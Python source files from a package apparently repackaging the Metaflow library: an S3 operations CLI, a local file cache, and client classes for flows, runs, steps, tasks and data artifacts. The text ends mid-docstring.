if 'CommonPrefixes' in page:
# we get CommonPrefixes if Delimiter is a non-empty string
for key in page.get('CommonPrefixes', []):
url = url_base + key['Prefix']
urlobj = S3Url(url=url,
bucket=prefix_url.bucket,
path=key['Prefix'],
local=None,
prefix=prefix_url.url)
urls.append((urlobj, None))
return True, prefix_url, urls
except self.s3.exceptions.NoSuchBucket:
return False, prefix_url, ERROR_URL_NOT_FOUND
except ClientError as err:
if err.response['Error']['Code'] == 'AccessDenied':
return False, prefix_url, ERROR_URL_ACCESS_DENIED
else:
raise
# We want to reuse an s3 client instance over multiple operations.
# This is accomplished by op_ functions below.
def op_get_size(urls):
s3 = S3Ops()
return [s3.get_size(url) for url in urls]
def op_list_prefix(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix) for prefix in prefix_urls]
def op_list_prefix_nonrecursive(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix, delimiter='/') for prefix in prefix_urls]
def exit(exit_code, url):
if exit_code == ERROR_INVALID_URL:
msg = 'Invalid url: %s' % url.url
elif exit_code == ERROR_NOT_FULL_PATH:
msg = 'URL not a full path: %s' % url.url
elif exit_code == ERROR_URL_NOT_FOUND:
msg = 'URL not found: %s' % url.url
elif exit_code == ERROR_URL_ACCESS_DENIED:
msg = 'Access denied to URL: %s' % url.url
elif exit_code == ERROR_WORKER_EXCEPTION:
msg = 'Download failed'
elif exit_code == ERROR_VERIFY_FAILED:
msg = 'Verification failed for URL %s, local file %s'\
% (url.url, url.local)
elif exit_code == ERROR_LOCAL_FILE_NOT_FOUND:
msg = 'Local file not found: %s' % url
else:
msg = 'Unknown error'
print('s3op failed:\n%s' % msg, file=sys.stderr)
sys.exit(exit_code)
def verify_results(urls, verbose=False):
for url, expected in urls:
if verbose:
print('verifying %s, expected %s' % (url, expected),
file=sys.stderr)
try:
got = os.stat(url.local).st_size
except OSError:
raise
exit(ERROR_VERIFY_FAILED, url)
if expected != got:
exit(ERROR_VERIFY_FAILED, url)
def generate_local_path(url):
# this function generates a safe local file name corresponding to
# an S3 URL. URLs may be longer than maximum file length limit on Linux,
# so we mostly hash the URL but retain the leaf part as a convenience
# feature to ease eyeballing
quoted = url_quote(url)
fname = quoted.split(b'/')[-1].replace(b'.', b'_').replace(b'-', b'_')
sha = sha1(quoted).hexdigest()
return u'-'.join((sha, fname.decode('utf-8')))
def parallel_op(op, lst, num_workers):
# parallel op divides work equally amongst num_workers
# processes. This is a good strategy if the cost is
# uniform over the units of work, e.g. op_get_size, which
# is a single HEAD request to S3.
#
# This approach is less optimal with op_list_prefix where
# the cost of S3 listing per prefix can vary drastically.
# We could optimize this case by using a worker model with
# a queue, like for downloads but the difference here is
# that we need to return a value, which would require a
# bit more work - something to consider if this turns out
# to be a bottleneck.
if lst:
num = min(len(lst), num_workers)
batch_size = math.ceil(len(lst) / float(num))
batches = []
it = iter(lst)
while True:
batch = list(islice(it, batch_size))
if batch:
batches.append(batch)
else:
break
it = parallel_map(op, batches, max_parallel=num)
for x in chain.from_iterable(it):
yield x
# CLI
@click.group()
def cli():
pass
@cli.command('list', help='List S3 objects')
@click.option('--inputs',
type=click.Path(exists=True),
help='Read input prefixes from the given file.')
@click.option('--num-workers',
default=NUM_WORKERS_DEFAULT,
show_default=True,
help='Number of concurrent connections.')
@click.option('--recursive/--no-recursive',
default=False,
show_default=True,
help='Download prefixes recursively.')
@click.argument('prefixes', nargs=-1)
def lst(prefixes,
inputs=None,
num_workers=None,
recursive=None):
urllist = []
for prefix in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(url=prefix,
bucket=src.netloc,
path=src.path.lstrip('/'),
local=None,
prefix=prefix)
if src.scheme != 's3':
exit(ERROR_INVALID_URL, url)
urllist.append(url)
op = op_list_prefix if recursive else op_list_prefix_nonrecursive
urls = []
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
else:
exit(ret, prefix_url)
for url, size in urls:
if size is None:
print(format_triplet(url.prefix, url.url))
else:
print(format_triplet(url.prefix, url.url, str(size)))
@cli.command(help='Upload files to S3')
@click.option('--file',
'files',
type=(click.Path(exists=True), str),
multiple=True,
help='Local file->S3Url pair to upload. '
'Can be specified multiple times.')
@click.option('--filelist',
type=click.Path(exists=True),
help='Read local file -> S3 URL mappings from the given file.')
@click.option('--num-workers',
default=NUM_WORKERS_DEFAULT,
show_default=True,
help='Number of concurrent connections.')
@click.option('--verbose/--no-verbose',
default=True,
show_default=True,
help='Print status information on stderr.')
@click.option('--overwrite/--no-overwrite',
default=True,
show_default=True,
help='Overwrite key if it already exists in S3.')
@click.option('--listing/--no-listing',
default=False,
show_default=True,
help='Print S3 URLs upload to on stdout.')
def put(files=None,
filelist=None,
num_workers=None,
verbose=None,
overwrite=True,
listing=None):
def _files():
for local, url in files:
yield url_unquote(local), url_unquote(url)
if filelist:
for line in open(filelist, mode='rb'):
local, url = map(url_unquote, line.split())
if not os.path.exists(local):
exit(ERROR_LOCAL_FILE_NOT_FOUND, local)
yield local, url
def _make_url(local, user_url):
src = urlparse(user_url)
url = S3Url(url=user_url,
bucket=src.netloc,
path=src.path.lstrip('/'),
local=local,
prefix=None)
if src.scheme != 's3':
exit(ERROR_INVALID_URL, url)
if not src.path:
exit(ERROR_NOT_FULL_PATH, url)
return url, os.stat(local).st_size
urls = list(starmap(_make_url, _files()))
if not overwrite:
new_urls = set()
for success, prefix_url, ret in parallel_op(op_get_size, list(list(zip(*urls))[0]), num_workers):
if ret == ERROR_URL_NOT_FOUND:
new_urls.add(prefix_url)
urls = [(url, size) for url, size in urls if url in new_urls]
process_urls('upload', urls, verbose, num_workers)
if listing:
for url, _ in urls:
print(format_triplet(url.url))
def _populate_prefixes(prefixes, inputs):
if not prefixes:
prefixes = []
if inputs:
with open(inputs, mode='rb') as f:
prefixes.extend(l.strip() for l in f)
return list(map(url_unquote, prefixes))
@cli.command(help='Download files from S3')
@click.option('--recursive/--no-recursive',
default=False,
show_default=True,
help='Download prefixes recursively.')
@click.option('--num-workers',
default=NUM_WORKERS_DEFAULT,
show_default=True,
help='Number of concurrent connections.')
@click.option('--inputs',
type=click.Path(exists=True),
help='Read input prefixes from the given file.')
@click.option('--verify/--no-verify',
default=True,
show_default=True,
help='Verify that files were loaded correctly.')
@click.option('--allow-missing/--no-allow-missing',
default=False,
show_default=True,
help='Do not exit if missing files are detected. '\
'Implies --verify.')
@click.option('--verbose/--no-verbose',
default=True,
show_default=True,
help='Print status information on stderr.')
@click.option('--listing/--no-listing',
default=False,
show_default=True,
help='Print S3 URL -> local file mapping on stdout.')
@click.argument('prefixes', nargs=-1)
def get(prefixes,
recursive=None,
num_workers=None,
inputs=None,
verify=None,
allow_missing=None,
verbose=None,
listing=None):
if allow_missing:
verify = True
# Construct a list of URL (prefix) objects
urllist = []
for prefix in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(url=prefix,
bucket=src.netloc,
path=src.path.lstrip('/'),
local=generate_local_path(prefix),
prefix=prefix)
if src.scheme != 's3':
exit(ERROR_INVALID_URL, url)
if not recursive and not src.path:
exit(ERROR_NOT_FULL_PATH, url)
urllist.append(url)
# Construct a url->size mapping
op = None
if recursive:
op = op_list_prefix
elif verify or verbose:
op = op_get_size
if op:
urls = []
# NOTE - we must retain the order of prefixes requested
# and the listing order returned by S3
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
elif ret == ERROR_URL_NOT_FOUND and allow_missing:
urls.append((prefix_url, None))
else:
exit(ret, prefix_url)
else:
# pretend zero size since we don't need it for anything.
# it can't be None though, to make sure the listing below
# works correctly (None denotes a missing file)
urls = [(prefix_url, 0) for prefix_url in urllist]
# exclude the non-existent files from loading
to_load = [(url, size) for url, size in urls if size is not None]
process_urls('download', to_load, verbose, num_workers)
# Postprocess
if verify:
verify_results(to_load, verbose=verbose)
if listing:
for url, size in urls:
if size is None:
print(format_triplet(url.url))
else:
print(format_triplet(url.prefix, url.url, url.local))
if __name__ == '__main__':
from botocore.exceptions import ClientError
cli(auto_envvar_prefix='S3OP') | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/datatools/s3op.py | s3op.py |
from __future__ import print_function
import os
import time
from tempfile import NamedTemporaryFile
from hashlib import sha1
from metaflow.datastore import DATASTORES
from metaflow.exception import MetaflowException
from metaflow.metaflow_config import CLIENT_CACHE_PATH, CLIENT_CACHE_MAX_SIZE
NEW_FILE_QUARANTINE = 10
class FileCacheException(MetaflowException):
headline = 'File cache error'
class FileCache(object):
def __init__(self, cache_dir=None, max_size=None):
self._cache_dir = cache_dir
self._max_size = max_size
if self._cache_dir is None:
self._cache_dir = CLIENT_CACHE_PATH
if self._max_size is None:
self._max_size = int(CLIENT_CACHE_MAX_SIZE)
self._total = 0
self._objects = None
def _index_objects(self):
objects = []
if os.path.exists(self._cache_dir):
for subdir in os.listdir(self._cache_dir):
root = os.path.join(self._cache_dir, subdir)
if os.path.isdir(root):
for obj in os.listdir(root):
if obj.endswith('.cached'):
path = os.path.join(root, obj)
objects.insert(0, (os.path.getctime(path),
os.path.getsize(path),
path))
self._total = sum(size for _, size, _ in objects)
self._objects = sorted(objects, reverse=False)
def _object_path(self, flow_name, run_id, step_name, task_id, name):
token = os.path.join(flow_name, run_id, step_name, task_id, name).encode('utf-8')
sha = sha1(token).hexdigest()
return os.path.join(self._cache_dir, sha[:2], sha + '.cached')
def _garbage_collect(self):
now = time.time()
while self._objects and self._total > self._max_size * 1024**2:
if now - self._objects[0][0] < NEW_FILE_QUARANTINE:
break
ctime, size, path = self._objects.pop(0)
self._total -= size
try:
os.remove(path)
except OSError:
# maybe another client had already GC'ed the file away
pass
def _makedirs(self, path):
# this is for python2 compatibility.
# Python3 has os.makedirs(exist_ok=True).
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def get_log(self, ds_type, logtype, attempt, flow_name, run_id, step_name, task_id):
path = self._object_path(flow_name, run_id, step_name, task_id, '_log%s' % logtype)
def load_func(ds):
return ds.load_log(logtype, attempt_override=attempt)
return self._internal_get_data(
ds_type, flow_name, run_id, step_name, task_id, path, load_func)
def get_data(self, ds_type, flow_name, sha):
path = self._object_path(flow_name, '_', '_', '_', sha)
def load_func(ds):
return ds.load_data(sha)
return self._internal_get_data(
ds_type, flow_name, None, None, None, path, load_func)
def _internal_get_data(self, ds_type, flow_name, run_id, step_name, task_id, path, load_func):
ds_cls = DATASTORES.get(ds_type, None)
if ds_cls is None:
raise FileCacheException('Datastore %s was not found' % ds_type)
if ds_cls.datastore_root is None:
def print_clean(line, **kwargs):
print(line)
ds_cls.datastore_root = ds_cls.get_datastore_root_from_config(
print_clean, create_on_absent=False)
if ds_cls.datastore_root is None:
raise FileCacheException('Cannot locate datastore root')
fileobj = None
if os.path.exists(path):
try:
fileobj = open(path, 'rb')
except IOError:
# maybe another client had already GC'ed the file away
fileobj = None
if fileobj is None:
if self._objects is None:
# index objects lazily at the first request. This can be
# an expensive operation
self._index_objects()
ds = ds_cls(flow_name, run_id, step_name, task_id, mode='d')
dirname = os.path.dirname(path)
try:
self._makedirs(dirname)
except: # noqa E722
raise FileCacheException('Could not create directory: %s' % dirname)
tmpfile = NamedTemporaryFile(dir=dirname, prefix='s3obj', delete=False)
try:
tmpfile.write(load_func(ds))
os.rename(tmpfile.name, path)
except: # noqa E722
os.unlink(tmpfile.name)
raise
size = os.path.getsize(path)
self._total += size
self._objects.append((int(time.time()), size, path))
self._garbage_collect()
fileobj = open(path, 'rb')
return fileobj | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/client/filecache.py | filecache.py |
from __future__ import print_function
import time
import tarfile
import json
from collections import namedtuple
from itertools import chain
from metaflow.environment import MetaflowEnvironment
from metaflow.exception import MetaflowNotFound,\
MetaflowNamespaceMismatch,\
MetaflowInternalError
from metaflow.metadata import LocalMetadataProvider, METADATAPROVIDERS
from metaflow.metaflow_config import DEFAULT_METADATA
from metaflow.plugins import ENVIRONMENTS
from metaflow.util import cached_property, resolve_identity
from .filecache import FileCache
try:
# python2
import cPickle as pickle
except: # noqa E722
# python3
import pickle
Metadata = namedtuple('Metadata', ['name',
'value',
'created_at',
'type',
'task'])
filecache = FileCache()
current_namespace = False
current_metadata = False
def metadata(ms):
"""
Switch Metadata provider.
This call has a global effect. Selecting the local metadata will,
for example, not allow access to information stored in remote
metadata providers.
Parameters
----------
ms : string
Can be a path (selects local metadata), a URL starting with http (selects
the service metadata) or an explicit specification <metadata_type>@<info>; as an
example, you can specify local@<path> or service@<url>.
Returns
-------
string
The description of the metadata selected (equivalent to the result of
get_metadata())
"""
global current_metadata
infos = ms.split('@', 1)
types = [m.TYPE for m in METADATAPROVIDERS]
if infos[0] in types:
current_metadata = [m for m in METADATAPROVIDERS if m.TYPE == infos[0]][0]
if len(infos) > 1:
current_metadata.INFO = infos[1]
else:
# Deduce from ms; if starts with http, use service or else use local
if ms.startswith('http'):
metadata_type = 'service'
else:
metadata_type = 'local'
res = [m for m in METADATAPROVIDERS if m.TYPE == metadata_type]
if not res:
print(
"Cannot find a '%s' metadata provider -- "
"try specifying one explicitly using <type>@<info>", metadata_type)
return get_metadata()
current_metadata = res[0]
current_metadata.INFO = ms
return get_metadata()
def get_metadata():
"""
Returns the current Metadata provider.
This call returns the current Metadata being used to return information
about Metaflow objects.
If this is not set explicitly using metadata(), the default value is
determined through environment variables.
Returns
-------
string
Information about the Metadata provider currently selected. This information typically
returns provider specific information (like URL for remote providers or local paths for
local providers).
"""
if current_metadata is False:
default_metadata()
return '%s@%s' % (current_metadata.TYPE, current_metadata.INFO)
def default_metadata():
"""
Resets the Metadata provider to the default value.
The default value of the Metadata provider is determined through a combination of
environment variables.
Returns
-------
string
The result of get_metadata() after resetting the provider.
"""
global current_metadata
default = [m for m in METADATAPROVIDERS if m.TYPE == DEFAULT_METADATA]
if default:
current_metadata = default[0]
else:
current_metadata = LocalMetadataProvider
return get_metadata()
def namespace(ns):
"""
Switch namespace to the one provided.
This call has a global effect. No objects outside this namespace
will be accessible. To access all objects regardless of namespaces,
pass None to this call.
Parameters
----------
ns : string
Namespace to switch to or None to ignore namespaces.
Returns
-------
string
Namespace set (result of get_namespace()).
"""
global current_namespace
current_namespace = ns
return get_namespace()
def get_namespace():
"""
Return the current namespace that is currently being used to filter objects.
The namespace is a tag associated with all objects in Metaflow.
Returns
-------
string or None
The current namespace used to filter objects.
"""
# see a comment about namespace initialization
# in Metaflow.__init__ below
if current_namespace is False:
default_namespace()
return current_namespace
def default_namespace():
"""
Sets or resets the namespace used to filter objects.
The default namespace is in the form 'user:<username>' and is intended to filter
objects belonging to the user.
Returns
-------
string
The result of get_namespace() after
"""
global current_namespace
current_namespace = resolve_identity()
return get_namespace()
class Metaflow(object):
"""
Entry point to all objects in the Metaflow universe.
This object can be used to list all the flows present either through the explicit property
or by iterating over this object.
Attributes
----------
flows : List of all flows.
Returns the list of all flows. Note that only flows present in the set namespace will
be returned. A flow is present in a namespace if it has at least one run in the
namespace.
"""
def __init__(self):
# the default namespace is activated lazily at the first object
# invocation or get_namespace(). The other option of activating
# the namespace at the import time is problematic, since there
# may be other modules that alter environment variables etc.
# which may affect the namescape setting.
if current_namespace is False:
default_namespace()
if current_metadata is False:
default_metadata()
self.metadata = current_metadata
@property
def flows(self):
"""
Returns a list of all the flows present.
Only flows present in the set namespace are returned. A flow is present in a namespace if
it has at least one run that is in the namespace.
Returns
-------
List[Flow]
List of all flows present.
"""
return list(self)
def __iter__(self):
"""
Iterator over all flows present.
Only flows present in the set namespace are returned. A flow is present in a namespace if
it has at least one run that is in the namespace.
Yields
-------
Flow
A Flow present in the Metaflow universe.
"""
# We do not filter on namespace in the request because
# filtering on namespace on flows means finding at least one
# run in this namespace. This is_in_namespace() function
# does this properly in this case
all_flows = self.metadata.get_object('root', 'flow')
all_flows = all_flows if all_flows else []
for flow in all_flows:
try:
v = Flow(_object=flow)
yield v
except MetaflowNamespaceMismatch:
continue
def __str__(self):
return 'Metaflow()'
def __getitem__(self, id):
"""
Returns a specific flow by name.
The flow will only be returned if it is present in the current namespace.
Parameters
----------
id : string
Name of the Flow
Returns
-------
Flow
Flow with the given ID.
"""
return Flow(id)
class MetaflowObject(object):
"""
Base class for all Metaflow objects.
Creates a new object of a specific type (Flow, Run, Step, Task, DataArtifact) given
a path to it (its `pathspec`).
Accessing Metaflow objects is done through one of two methods:
- either by directly instantiating it with this class
- or by accessing it through its parent (iterating over
all children or accessing directly using the [] operator)
With this class, you can:
- Get a `Flow`; use `Flow('FlowName')`.
- Get a `Run` of a flow; use `Run('FlowName/RunID')`.
- Get a `Step` of a run; use `Step('FlowName/RunID/StepName')`.
- Get a `Task` of a step, use `Task('FlowName/RunID/StepName/TaskID')`
- Get a `DataArtifact` of a task; use
`DataArtifact('FlowName/RunID/StepName/TaskID/ArtifactName')`.
Attributes
----------
tags : Set
Tags associated with the object.
created_at : datetime
Date and time this object was first created.
parent : MetaflowObject
Parent of this object. The parent of a `Run` is a `Flow` for example
pathspec : string
Pathspec of this object (for example: 'FlowName/RunID' for a `Run`)
path_components : List[string]
Components of the pathspec
"""
_NAME = 'base'
_CHILD_CLASS = None
def __init__(self,
pathspec=None,
_object=None,
_parent=None,
_namespace_check=True):
self._metaflow = Metaflow()
if pathspec:
ids = pathspec.split('/')
parents = ids[:-1]
self.id = ids[-1]
self._parent = self._create_parents(parents)
self._object = self._get_object(*ids)
else:
self._parent = _parent
self._object = _object
if self._NAME in ('flow', 'task'):
self.id = str(self._object[self._NAME + '_id'])
elif self._NAME == 'run':
self.id = str(self._object['run_number'])
elif self._NAME == 'step':
self.id = str(self._object['step_name'])
elif self._NAME == 'artifact':
self.id = str(self._object['name'])
else:
raise MetaflowInternalError(msg="Unknown type: %s" % self._NAME)
self._created_at = time.strftime(
'%Y-%m-%dT%H:%M:%S.%fZ', time.gmtime(self._object['ts_epoch']//1000))
self._tags = frozenset(chain(self._object.get('system_tags') or [],
self._object.get('tags') or []))
if _namespace_check and not self.is_in_namespace():
raise MetaflowNamespaceMismatch(current_namespace)
def _get_object(self, *path_components):
result = self._metaflow.metadata.get_object(self._NAME, 'self', None, *path_components)
if not result:
raise MetaflowNotFound("%s does not exist" % self)
return result
def _create_parents(self, parents):
if parents:
parent = self._metaflow
for id in parents:
parent = parent[id]
return parent
else:
return None
def __iter__(self):
"""
Iterate over all child objects of this object if any.
Note that only children present in the current namespace are returned.
Returns
-------
Iterator[MetaflowObject]
Iterator over all children
"""
query_filter = {}
if current_namespace:
query_filter = {'any_tags': current_namespace}
unfiltered_children = self._metaflow.metadata.get_object(
self._NAME, self._CHILD_CLASS._NAME, query_filter, *self.path_components)
unfiltered_children = unfiltered_children if unfiltered_children else []
children = filter(
lambda x: self._iter_filter(x),
(self._CHILD_CLASS(_object=obj, _parent=self, _namespace_check=False)
for obj in unfiltered_children))
if children:
return iter(sorted(children, reverse=True, key=lambda x: x.created_at))
else:
return iter([])
def _iter_filter(self, x):
return True
def _filtered_children(self, *tags):
for child in self:
if all(tag in child.tags for tag in tags):
yield child
def is_in_namespace(self):
"""
Returns whether this object is in the current namespace.
If the current namespace is None, this will always return True.
Returns
-------
bool
Whether or not the object is in the current namespace
"""
if self._NAME == 'flow':
return any(True for _ in self)
else:
return current_namespace is None or\
current_namespace in self._tags
def __str__(self):
return "%s('%s')" % (self.__class__.__name__, self.pathspec)
def __repr__(self):
return str(self)
def _get_child(self, id):
result = []
for p in self.path_components:
result.append(p)
result.append(id)
return self._metaflow.metadata.get_object(
self._CHILD_CLASS._NAME, 'self', None, *result)
def __getitem__(self, id):
"""
Returns the child object named 'id'.
Parameters
----------
id : string
Name of the child object
Returns
-------
MetaflowObject
Child object
Raises
------
KeyError
If the name does not identify a valid child object
"""
obj = self._get_child(id)
if obj:
return self._CHILD_CLASS(_object=obj, _parent=self)
else:
raise KeyError(id)
def __contains__(self, id):
"""
Tests whether a child named 'id' exists.
Parameters
----------
id : string
Name of the child object
Returns
-------
bool
True if the child exists or False otherwise
"""
return bool(self._get_child(id))
@property
def tags(self):
"""
Tags associated with this object.
Tags can be user defined or system defined. This returns all tags associated
with the object.
Returns
-------
List[string]
Tags associated with the object
"""
return self._tags
@property
def created_at(self):
"""
Creation time for this object.
This corresponds to the time the object's existence was first created which typically means
right before any code is run.
Returns
-------
datetime
Date time of this object's creation.
"""
return self._created_at
@property
def parent(self):
"""
Returns the parent object of this object or None if none exists.
Returns
-------
MetaflowObject
The parent of this object
"""
return self._parent
@property
def pathspec(self):
"""
Returns a string representation uniquely identifying this object.
The string is the same as the one you would pass into the constructor
to build this object.
Returns
-------
string
Unique representation of this object
"""
return '/'.join(self.path_components)
@property
def path_components(self):
"""
List of individual components of the pathspec.
Returns
-------
List[string]
Individual components of the pathspec
"""
def traverse(obj, lst):
lst.insert(0, obj.id)
if obj._parent:
return traverse(obj._parent, lst)
else:
return lst
return traverse(self, [])
class MetaflowData(object):
def __init__(self, artifacts):
self._artifacts = dict((art.id, art) for art in artifacts)
def __getattr__(self, name):
return self._artifacts[name].data
def __contains__(self, var):
return var in self._artifacts
def __str__(self):
return '<MetaflowData: %s>' % ', '.join(self._artifacts)
def __repr__(self):
return str(self)
class MetaflowCode(object):
"""
Describes the code that is occasionally stored with a run.
A code package will contain the version of Metaflow that was used (all the files comprising
the Metaflow library) as well as selected files from the directory containing the Python
file of the FlowSpec.
Attributes
----------
path : string
Location (in the datastore provider) of the code package
info : Dict
Dictionary of information related to this code-package
flowspec : string
Source code of the file containing the FlowSpec in this code package
tarball : TarFile
Tar ball containing all the code
"""
def __init__(self, flow_name, code_package):
self._flow_name = flow_name
info = json.loads(code_package)
self._path = info['location']
self._ds_type = info['ds_type']
self._sha = info['sha']
with filecache.get_data(self._ds_type, self._flow_name, self._sha) as f:
self._tar = tarfile.TarFile(fileobj=f)
# The JSON module in Python3 deals with Unicode. Tar gives bytes.
info_str = self._tar.extractfile('INFO').read().decode('utf-8')
self._info = json.loads(info_str)
self._flowspec = self._tar.extractfile(self._info['script']).read()
@property
def path(self):
"""
Location (in the datastore provider) of the code package.
Returns
-------
string
Full path of the code package
"""
return self._path
@property
def info(self):
"""
Metadata associated with the code package.
Returns
-------
Dict
Dictionary of metadata. Keys and values are strings
"""
return self._info
@property
def flowspec(self):
"""
Source code of the Python file containing the FlowSpec.
Returns
-------
string
Content of the Python file
"""
return self._flowspec
@property
def tarball(self):
"""
TarFile for this code package.
Returns
-------
TarFile
TarFile for everything in this code package
"""
return self._tar
def __str__(self):
return '<MetaflowCode: %s>' % self._info['script']
class DataArtifact(MetaflowObject):
"""
A single data artifact and associated metadata.
Attributes
----------
data : object
The unpickled representation of the data contained in this artifact
sha : string
SHA encoding representing the unique identity of this artifact
finished_at : datetime
Alias for created_at
"""
_NAME = 'artifact'
_CHILD_CLASS = None
@property
def data(self):
"""
Unpickled representation of the data contained in this artifact.
Returns
-------
object
Object contained in this artifact
"""
ds_type = self._object['ds_type']
sha = self._object['sha']
with filecache.get_data(ds_type, self.path_components[0], sha) as f:
obj = pickle.load(f)
return obj
# TODO add
# @property
# def size(self)
# TODO add
# @property
# def type(self)
@property
def sha(self):
"""
Unique identifier for this artifact.
This is the SHA1 hash of the artifact.
Returns
-------
string
Hash of this artifact
"""
return self._object['sha']
@property
def finished_at(self):
"""
Creation time for this artifact.
Alias for created_at.
Returns
-------
datetime
Creation time
"""
return self.created_at
class Task(MetaflowObject):
"""
A Task represents an execution of a step.
As such, it contains all data artifacts associated with that execution as well as all metadata
associated with the execution.
Attributes
----------
metadata : List[Metadata]
List of all metadata associated with the task
metadata_dict : Dict
Dictionary where the keys are the names of the metadata and the value are the values
associated with those names
data : MetaflowData
Container of all data artifacts produced by this task
artifacts : MetaflowArtifacts
Container of DataArtifact objects produced by this task
successful : boolean
True if the task successfully completed
finished : boolean
True if the task completed
exception : object
Exception raised by this task if there was one
finished_at : datetime
Time this task finished
runtime_name : string
Runtime this task was executed on
stdout : string
Standard output for the task execution
stderr : string
Standard error output for the task execution
code : MetaflowCode
Code package for this task (if present)
environment_info : Dict
Information about the execution environment (for example Conda)
"""
_NAME = 'task'
_CHILD_CLASS = DataArtifact
def __init__(self, *args, **kwargs):
super(Task, self).__init__(*args, **kwargs)
def _iter_filter(self, x):
# exclude private data artifacts
return x.id[0] != '_'
@property
def metadata(self):
"""
Metadata events produced by this task.
Note that Metadata is different from tags.
Returns
-------
List[Metadata]
Metadata produced by this task
"""
all_metadata = self._metaflow.metadata.get_object(
self._NAME, 'metadata', None, *self.path_components)
all_metadata = all_metadata if all_metadata else []
return [Metadata(name=obj.get('field_name'),
value=obj.get('value'),
created_at=obj.get('ts_epoch'),
type=obj.get('type'),
task=self) for obj in all_metadata]
@property
def metadata_dict(self):
"""
Dictionary mapping metadata names (keys) and their associated values.
Note that unlike the metadata() method, this call will only return the latest
metadata for a given name. For example, if a task executes multiple times (retries),
the same metadata name will be generated multiple times (one for each execution of the
task). The metadata() method returns all those metadata elements whereas this call will
return the metadata associated with the latest execution of the task.
Returns
-------
Dict
Dictionary mapping metadata name with value
"""
# use the newest version of each key, hence sorting
return {m.name: m.value
for m in sorted(self.metadata, key=lambda m: m.created_at)}
@property
def index(self):
"""
Returns the index of the innermost foreach loop if this task is run inside at least
one foreach.
The index is what distinguishes the various tasks inside a given step.
This call returns None if this task was not run in a foreach loop.
Returns
-------
int
Index in the innermost loop for this task
"""
try:
return self['_foreach_stack'].data[-1].index
except (KeyError, IndexError):
return None
@property
def data(self):
"""
Returns a container of data artifacts producted by this task.
You can access data produced by this task as follows:
```
print(task.data.my_var)
```
Returns
-------
MetaflowData
Container of all artifacts produced by this task
"""
return MetaflowData(self)
@property
def artifacts(self):
"""
Returns a container of DataArtifacts producted by this task.
You can access each DataArtifact by name like so:
```
print(task.artifacts.my_var)
```
This method differs from data() because it returns DataArtifact objects
(which contain additional metadata) as opposed to just the data.
Returns
-------
MetaflowArtifacts
Container of all DataArtifacts produced by this task
"""
arts = list(self)
obj = namedtuple('MetaflowArtifacts', [art.id for art in self])
return obj._make(arts)
@property
def successful(self):
"""
Indicates whether or not the task completed successfully.
This information is always about the latest task to have completed (in case
of retries).
Returns
-------
bool
True if the task completed successfully and False otherwise
"""
try:
return self['_success'].data
except KeyError:
return False
@property
def finished(self):
"""
Indicates whether or not the task completed.
This information is always about the latest task to have completed (in case
of retries).
Returns
-------
bool
True if the task completed and False otherwise
"""
try:
return self['_task_ok'].data
except KeyError:
return False
@property
def exception(self):
"""
Returns the exception that caused the task to fail, if any.
This information is always about the latest task to have completed (in case
of retries). If successful() returns False and finished() returns True,
this method can help determine what went wrong.
Returns
-------
object
Exception raised by the task or None if not applicable
"""
try:
return self['_exception'].data
except KeyError:
return None
@property
def finished_at(self):
"""
Returns the datetime object of when the task finished (successfully or not).
This information is always about the latest task to have completed (in case
of retries). This call will return None if the task is not finished.
Returns
-------
datetime
Datetime of when the task finished
"""
try:
return self['_task_ok'].created_at
except KeyError:
return None
@property
def runtime_name(self):
"""
Returns the name of the runtime this task executed on.
Returns
-------
string
Name of the runtime this task executed on
"""
for t in self._tags:
if t.startswith('runtime:'):
return t.split(':')[1]
return None
@property
def stdout(self):
"""
Returns the full standard out of this task.
This information relates to the latest task that completed (in case of retries). In other
words, this does not return the realtime logs of execution.
Returns
-------
string
Standard output of this task
"""
logtype = 'stdout'
return self._load_log(logtype)
@property
def stderr(self):
"""
Returns the full standard error of this task.
This information relates to the latest task that completed (in case of retries). In other
words, this does not return the realtime logs of execution.
Returns
-------
string
Standard error of this task
"""
logtype = 'stderr'
return self._load_log(logtype)
@cached_property
def code(self):
"""
Returns the MetaflowCode object for this task, if present.
Not all tasks save their code so this call may return None in those cases.
Returns
-------
MetaflowCode
Code package for this task
"""
code_package = self.metadata_dict.get('code-package')
if code_package:
return MetaflowCode(self.path_components[0], code_package)
return None
@cached_property
def environment_info(self):
"""
Returns information about the environment that was used to execute this task. As an
example, if the Conda environment is selected, this will return information about the
dependencies that were used in the environment.
This environment information is only available for tasks that have a code package.
Returns
-------
Dict
Dictionary describing the environment
"""
my_code = self.code
if not my_code:
return None
env_type = my_code.info['environment_type']
if not env_type:
return None
env = [m for m in ENVIRONMENTS + [MetaflowEnvironment] if m.TYPE == env_type][0]
return env.get_client_info(self.path_components[0], self.metadata_dict)
def _load_log(self, logtype, as_unicode=True):
ret_val = None
log_info = self.metadata_dict.get('log_location_%s' % logtype)
if log_info:
log_info = json.loads(log_info)
ds_type = log_info['ds_type']
attempt = log_info['attempt']
components = self.path_components
with filecache.get_log(ds_type, logtype, int(attempt), *components) as f:
ret_val = f.read()
if as_unicode and (ret_val is not None):
return ret_val.decode(encoding='utf8')
else:
return ret_val
class Step(MetaflowObject):
"""
A Step represents a user-defined Step (a method annotated with the @step decorator).
As such, it contains all Tasks associated with the step (ie: all executions of the
Step). A linear Step will have only one associated task whereas a foreach Step will have
multiple Tasks.
Attributes
----------
task : Task
Returns a Task object from the step
finished_at : datetime
Time this step finished (time of completion of the last task)
environment_info : Dict
Information about the execution environment (for example Conda)
"""
_NAME = 'step'
_CHILD_CLASS = Task
@property
def task(self):
"""
Returns a Task object belonging to this step.
This is useful when the step only contains one task (a linear step for example).
Returns
-------
Task
A task in the step
"""
for t in self:
return t
def tasks(self, *tags):
"""
Returns an iterator over all the tasks in the step.
An optional filter is available that allows you to filter on tags. The
tasks returned if the filter is specified will contain all the tags
specified.
Parameters
----------
tags : string
Tags to match
Returns
-------
Iterator[Task]
Iterator over Task objects in this step
"""
return self._filtered_children(*tags)
@property
def finished_at(self):
"""
